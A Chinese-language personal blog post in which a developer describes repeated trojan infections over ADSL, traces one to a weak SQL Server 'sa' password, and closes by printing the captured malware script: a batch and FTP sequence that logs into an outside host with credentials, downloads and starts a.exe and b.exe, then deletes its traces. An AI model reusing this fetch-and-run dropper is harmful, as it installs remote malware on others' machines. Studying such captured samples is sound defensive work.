我的电脑在北京用的是长城宽带上网,理所当然是小区宽带了,很好,每天进行我的网络冲浪,无论网银,无论一些无聊的肤浅的一点木马网站,呵呵,一点问题都没有,无非有个木马了,一下就被360杀毒给提示了,遇到插件我就不装,遇到非安全的网页我就不看,倒也悠哉悠哉,生活是多么的美好啊! 终于有一天,我到了外地用了ADSL上网,在那一个月的时间里,我饱受木马病毒的折磨,我上网的第一天,突然我的鼠标自己难于控制,我立即意识到有个人远程控制我了,跟我进行强鼠标,我赶紧按下了CTRL+ALT+DEL键,那个无聊客竟然在用户名栏输入user$,意图登陆,呵呵呵,逗的我一直乐,同时我觉得完蛋了,我怎么会中了木马了呢,我用360一查,确实有好几个木马,我就用360杀,木马很容易就被清楚了,但是一会功夫我就又中招了,没办法,那就还原系统呗,OK,不就几分钟的事吗,好了,继续我的游戏开发吧,说干就干,可是没有半小时最多一个小时的光景,不好,360又开始报告有几个文件被隔离了,我一看文件名是a.exe,b.exe,绝对是木马!
再用360查杀,好了一会,又不可以了,以后总是这样反反复复,就这样我不到十天,还原了十几次系统,那个郁闷呀,我全盘扫描,杀,总之把扫到的病毒,疑似病毒,毫不客气的格杀勿论,但是木马跟我玩上了,郁闷啊!以后的日子就是中了就还原,中招了就还原,这个世界总是存在一些无聊的人,以侵犯别人感到光荣,操!
后来的日子我回到了北京,又开始我的长城宽带了,耶,木马没有了,病毒消失了,那个开心了就别提了,但是原因是什么呢,我一肚子的纳闷啊,是长城宽带装了防火墙,抗木马,抗攻击的软件给木马过滤掉了吗?目前只能这么认为了,后来我又有幸有机会用了一次中国电信的LAN上网但是形式还是ADSL上网,不好,我上网又不到半小时,360又开始提示有文件隔离了,我心中的担心又开始了,不过这次非常幸运,我直接找到了那个文件,一下就给他那个dll删除了,sermssql.dll,为什么以前没有解决呢,因为这次的时机特别恰当,以前我去删除的时候都不让删除,我还以为是病毒自己限制的呢,现在才知道是360的隔离效果,这个时候我不仅又联想到了在一个用户那里开始架设游戏的时候,架设过程中突然中毒了,那个时候也是找不到中毒的原因,猜想是sqlserver密码太简单了,这个文件又是跟sql有关的,一下就想到了sql密码太简单遭到的攻击,因为我的sa的密码是123,哈哈,并非是黑客就一定很高明,只不过大部分人警惕心不够,容易出现漏洞而已,这个问题对与我一个开发人员来说,是一件很让人感到惭愧的事,希望大家开发过程中要严格遵守开发之道,用电脑之道,凡事皆然!
看他这个工作过程的代码:
ftp -s:C:/WINDOWS/system32/wbem/dboysba.sys
start C:/WINDOWS/system32/wbem/a.exe
ping -n 10 127.0.0.1
start C:/WINDOWS/system32/wbem/b.exe
del C:/WINDOWS/system32/wbem/dboysba.sys
del C:/WINDOWS/system32/wbem/dboysba.bat
open wufayy.3322.org
kao
si
get a.exe C:/WINDOWS/system32/wbem/a.exe
get b.exe C:/WINDOWS/system32/wbem/b.exe
bye
扫一扫
68
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
